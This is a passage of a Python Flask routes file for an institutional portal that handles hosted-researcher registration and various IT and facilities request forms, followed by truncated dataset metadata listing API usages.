==\"Others\" and qualification !=\"Others\":\n control.setHostedResearcher( name, dob, cnic, qualification, academic_record, present_status2,\n designation, enrollemnt_no, uni, department, permanent_address,\n mailing_address, landline, cell, email, researcher_category, department_NCP,\n duration_NCP, supervisor_from_NCP, cosupervisor_from_NCP,picture,supervisor_name,supervisor_department,tendate,gender,province,city )\n elif qualification ==\"Others\" and present_status == \"Others\":\n control.setHostedResearcher( name, dob, cnic, qualification2, academic_record, present_status2,\n designation, enrollemnt_no, uni, department, permanent_address,\n mailing_address, landline, cell, email, researcher_category, department_NCP,\n duration_NCP, supervisor_from_NCP, cosupervisor_from_NCP, picture,supervisor_name,supervisor_department,tendate,gender,province,city)\n else:\n control.setHostedResearcher(session['id'],name,dob,cnic,qualification,academic_record,present_status,designation,enrollemnt_no,uni,department,permanent_address,mailing_address,landline,cell,email,researcher_category,department_NCP,duration_NCP,supervisor_from_NCP,cosupervisor_from_NCP,picture,supervisor_name,supervisor_department,tendate,gender,province,city)\n control.sethostedRequest(session['id'])\n\n return render_template(\"home2.html\",name=session['name'])\n#software Form\n@app.route('/software_form', methods=['POST', 'GET'])\ndef softwareForm():\n row = control.getEmpolyees()\n return render_template('software.html', title='Software Request Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/cluster_form', methods=['POST', 'GET'])\ndef clusterForm():\n row = control.getEmpolyees()\n return render_template('cluster.html', title='Cluster Login Request Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/clearance_form', methods=['POST', 'GET'])\ndef clearanceform():\n row = control.getEmpolyees()\n return render_template('clearance.html', title='Clearance Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/equipment_form', methods=['POST', 'GET'])\ndef equipmentform():\n row = control.getEmpolyees()\n return render_template('equipment.html', title='Equipment Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/web_form', methods=['POST', 'GET'])\ndef webform():\n row = control.getEmpolyees()\n return render_template('website.html', title='Website Modification Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/colorprint_form', methods=['POST', 'GET'])\ndef colorprintform():\n row = control.getEmpolyees()\n return render_template('colorprint.html', title='Color Print Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/telephone_form', methods=['POST', 'GET'])\ndef telephoneform():\n row = control.getEmpolyees()\n return render_template('telephone.html', title='Telephone Extension Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/createaccount', methods=['POST', 'GET'])\ndef accountcreate():\n return render_template('createaccount.html', title='Registration')\n\n@app.route('/submit_form', methods=['POST', 'GET'])\ndef form_submit():\n if request.method == 'POST':\n name=request.form['name']\n username=request.form['username']\n email=request.form['email']\n password=request.form['ps']\n control.setUserDetail(name,username,email,password)\n return \"User save\"\n@app.route('/logout')\ndef logout():\n session.pop('name', None)\n return render_template('index.html')\n@app.route('/printregister')\ndef print_register():\n row=control.getHostedDeail(session['id'])\n for i in row:\n image=i[27]\n image = b64encode(image).decode(\"utf-8\")\n return render_template('printregister.html',row=row,image=image,title=\"Hosted Researcher Detail\")\n\n@app.route('/homeview')\ndef viewhome():\n return render_template('home.html',name=session['name'])\n@app.route('/caad')\ndef opencadd():\n return render_template('caad.html',name=session['name'])\n@app.route('/caddreports')\ndef caadreport():\n return render_template('caadreports.html',name=session['name'])\n\n@app.route('/request_caad')\ndef requesttocaad():\n row=control.getCaadRequest()\n return render_template('requestcaad.html',name=session['name'],row=row)\n@app.route('/reportcaadview', methods=['POST','GET'])\ndef caadreportview():\n if request.method == 'POST':\n id=request.form['id']\n row = control.getHostedDeail(id)\n for i in row:\n image = i[27]\n image = b64encode(image).decode(\"utf-8\")\n return render_template('caadreportview.html',name=session['name'],row=row,image=image)\n@app.route('/requestcaadview', methods=['POST','GET'])\ndef caadrequesttview():\n if request.method == 'POST':\n id=request.form['id']\n row = control.getHostedDeail(id)\n for i in row:\n image = i[27]\n image = b64encode(image).decode(\"utf-8\")\n return render_template('caadrequestview.html',name=session['name'],row=row,image=image)\n@app.route('/newid', methods=['POST','GET'])\ndef idnew():\n if request.method == 'POST':\n id=request.form['id']\n newid=request.form['newid']\n control.sethostednewid(id,newid)\n control.deleteCaadRequest(id)\n row = control.getCaadRequest()\n return render_template('requestcaad.html', name=session['name'], row=row)\n@app.route('/save_software_request',methods=['POST','GET'])\ndef software_request_save():\n if request.method=='POST':\n subject=\"Software Application Request\"\n software=request.form['softwarename']\n type=request.form['softtype']\n description=request.form['sofdis']\n content=\"Software Name: '\"+software+\"' type: '\"+type+ \"' Description: '\"+description+\"'\"\n forward = request.form['appforward']\n control.setSoftwareRequest(subject,content,forward,session['id'],software,type)\n return \"Request Forward\"\n@app.route('/save_cluster_request',methods=['POST','GET'])\ndef cluster_request_save():\n if request.method=='POST':\n subject=\"Cluster Login Request\"\n print(\"ahmad\")\n uni=request.form['cuc']\n\n thesis=request.form['ctrt']\n compiler=request.form['ccr']\n packages=request.form['cpr']\n fom=request.form['loginfrom']\n to=request.form['loginto']\n print(\"ahmad\")\n file=request.files['appfile']\n print(\"ahmad\")\n content=\"Thesis Title: '\"+thesis+\"' Compiler Required: '\"+compiler+ \"' Packages: '\"+packages+\"' from: '\"+fom+\"' to: '\"+to+\"'\"\n forward = request.form['appforward']\n control.setClusterRequest(subject,content,forward,session['id'],uni,compiler,packages,fom,to,file)\n return \"Request Forward\"\n\n@app.route('/save_clearance_request',methods=['POST','GET'])\ndef clearance_request_save():\n if request.method=='POST':\n subject=\"Cluster Login Request\"\n content=request.form['comment']\n forward = request.form['appforward']\n control.setItClearance(subject,content,forward,session['id'])\n return \"Request Forward\"\n\n@app.route('/save_itequipments_request',methods=['POST','GET'])\ndef itequipments_request_save():\n if request.method=='POST':\n subject=\"IT Equipments Issuance\"\n location=request.form.get('location')\n timefrom=request.form.get('tfrom')\n timeto=request.form.get('tto')\n datefrom=request.form.get('dfrom')\n dateto=request.form.get('dto')\n laptop=request.form.get('checklaptop')\n mouse=request.form.get('checkmouse')\n keyborad=request.form.get('checkkeyboard')\n speaker=request.form.get('checkspeaker')\n presernter=request.form.get('checkPresenter')\n pointer=request.form.get('checkPointer')\n projector=request.form.get('checkProjector')\n micro=request.form.get('checkmicro')\n hdmi=request.form.get('checkhdmi')\n tripord=request.form.get('checktripod')\n content=\"Eqiupments Required Keyboard '\"+str(keyborad)+\"', Mouse: '\"+str(mouse)+\"' , Speaker: '\"+str(speaker)+\"' , Presenter: '\"+str(presernter)+\"' \"\n forward = request.form['appforward']\n control.setITequipments(subject,content,forward,session['id'],location,timefrom,timeto,datefrom,dateto,laptop,mouse,keyborad,speaker,presernter,pointer,projector,micro,hdmi,tripord)\n return \"Request Forward\"\n@app.route('/save_website_request',methods=['POST','GET'])\ndef website_request_save():\n if request.method=='POST':\n subject=\"Website Modification Request\"\n type=request.form.get('webtype')\n detail=request.form.get('webdetail')\n content=\"Webpage: '\"+type+\"' Detail: '\"+detail+\"'\"\n forward = request.form['appforward']\n control.setwebsiteRequest(subject,content,forward,session['id'])\n return \"Request Forward\"\n@app.route('/save_colorprint_request',methods=['POST','GET'])\ndef colorprint_request_save():\n if request.method=='POST':\n subject=\"Photocopy/ColorPrint Request\"\n pages=request.form.get('pages')\n content=\"Kindly Add '\"+pages+\"' color print pages \"\n forward = request.form['appforward']\n control.setcolorprintRequest(subject,content,forward,session['id'])\n return \"Request Forward\"\n@app.route('/save_telephone_request',methods=['POST','GET'])\ndef telephone_request_save():\n if request.method=='POST':\n subject=\"Telephone Extension Requirement\"\n biulding=request.form.get('logingbuilding')\n floor=request.form.get('loginflorr')\n room=request.form.get('loginroom')\n telephone=request.form.get('ttype')\n extendion=request.form.get('degree')\n national=request.form.get('cv')\n international=request.form.get('cp')\n content=\"Telephone Connection Required in Building '\"+biulding+\"', floor '\"+floor+\"' and room '\"+room+\"'\"\n forward = request.form['appforward']\n control.settelophone(subject,content,forward,session['id'],biulding,floor,room,telephone,extendion,national,international)\n return \"Request Forward\"\n@app.route('/uni')\ndef uni():\n row=control.gethoste()\n return render_template('caadreports.html' ,row=row,name=session['name'],title='CAAD Record')\n", "sub_path": "app/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 22477, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "app.Controller.Controller", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 11, "usage_type": "call"}, {"api_name": "app.app", "line_number": 11, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 12, "usage_type": "call"}, {"api_name": "app.app", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 36, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 16, "usage_type": "call"}, {"api_name": "app.app", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 45, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 43, "usage_type": "call"}, {"api_name": "app.app", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 50, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 47, "usage_type": "call"}, {"api_name": "app.app", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 57, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 52, "usage_type": "call"}, {"api_name": "app.app", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 62, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 59, "usage_type": "call"}, {"api_name": "app.app", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 71, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 64, "usage_type": "call"}, {"api_name": "app.app", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 76, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 73, "usage_type": "call"}, {"api_name": "app.app", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 84, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 78, "usage_type": "call"}, {"api_name": "app.app", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 91, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 92, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 94, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 96, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 86, "usage_type": "call"}, {"api_name": "app.app", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 101, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 98, "usage_type": "call"}, {"api_name": "app.app", "line_number": 98, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 107, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 107, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 108, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 108, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 110, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 111, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 111, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 112, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 112, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 113, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 114, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 115, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 115, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 116, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 117, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 117, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.request.files.getlist", "line_number": 120, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 120, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 120, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 121, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 103, "usage_type": "call"}, {"api_name": "app.app", "line_number": 103, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 127, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 127, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 124, "usage_type": "call"}, {"api_name": "app.app", "line_number": 124, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 131, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 135, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 135, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 136, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 136, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 137, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 137, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 138, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 138, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 139, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 139, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 141, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 141, "usage_type": "name"}, {"api_name": "flask.request.files.getlist", "line_number": 142, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 142, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 142, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 143, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 129, "usage_type": "call"}, {"api_name": "app.app", "line_number": 129, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 149, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 149, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 146, "usage_type": "call"}, {"api_name": "app.app", "line_number": 146, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 153, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 153, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 155, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 155, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 156, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 156, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 157, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 157, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 158, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 158, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 159, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 159, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 161, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 161, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 162, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 151, "usage_type": "call"}, {"api_name": "app.app", "line_number": 151, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 168, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 165, "usage_type": "call"}, {"api_name": "app.app", "line_number": 165, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 172, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 172, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 174, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 174, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 176, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 176, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 177, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 170, "usage_type": "call"}, {"api_name": "app.app", "line_number": 170, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 183, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 183, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 180, "usage_type": "call"}, {"api_name": "app.app", "line_number": 180, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 187, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 187, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 189, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 189, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 191, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 191, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 192, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 185, "usage_type": "call"}, {"api_name": "app.app", "line_number": 185, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 198, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 198, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 195, "usage_type": "call"}, {"api_name": "app.app", "line_number": 195, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 202, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 202, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 204, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 204, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 205, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 205, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 206, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 200, "usage_type": "call"}, {"api_name": "app.app", "line_number": 200, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 211, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 211, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 212, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 212, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 213, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 213, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 214, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 214, "usage_type": "name"}, {"api_name": "flask.request.files.getlist", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 217, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 217, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 218, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 209, "usage_type": "call"}, {"api_name": "app.app", "line_number": 209, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 223, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 223, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 225, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 225, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 226, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 226, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 227, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 227, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 228, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 228, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 231, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 231, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 232, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 232, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 234, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 234, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 235, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 235, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 238, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 238, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 239, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 239, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 240, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 240, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 241, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 241, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 242, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 242, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 243, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 243, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 244, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 244, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 245, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 245, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 246, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 246, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 248, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 248, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 249, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 249, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 250, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 250, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 251, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 251, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 252, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 252, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 253, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 253, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 254, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 254, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 255, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 255, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 256, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 273, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 274, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 276, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 276, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 220, "usage_type": "call"}, {"api_name": "app.app", "line_number": 220, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 281, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 281, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 282, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 278, "usage_type": "call"}, {"api_name": "app.app", "line_number": 278, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 286, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 286, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 287, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 283, "usage_type": "call"}, {"api_name": "app.app", "line_number": 283, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 291, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 291, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 292, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 288, "usage_type": "call"}, {"api_name": "app.app", "line_number": 288, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 296, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 296, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 297, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 293, "usage_type": "call"}, {"api_name": "app.app", "line_number": 293, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 301, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 301, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 302, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 298, "usage_type": "call"}, {"api_name": "app.app", "line_number": 298, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 306, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 306, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 307, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 303, "usage_type": "call"}, {"api_name": "app.app", "line_number": 303, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 311, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 311, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 312, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 308, "usage_type": "call"}, {"api_name": "app.app", "line_number": 308, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 315, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 313, "usage_type": "call"}, {"api_name": "app.app", "line_number": 313, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 319, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 319, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 320, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 320, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 321, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 321, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 322, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 322, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 323, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 323, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 317, "usage_type": "call"}, {"api_name": "app.app", "line_number": 317, "usage_type": "name"}, {"api_name": "flask.session.pop", "line_number": 328, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 328, "usage_type": "name"}, 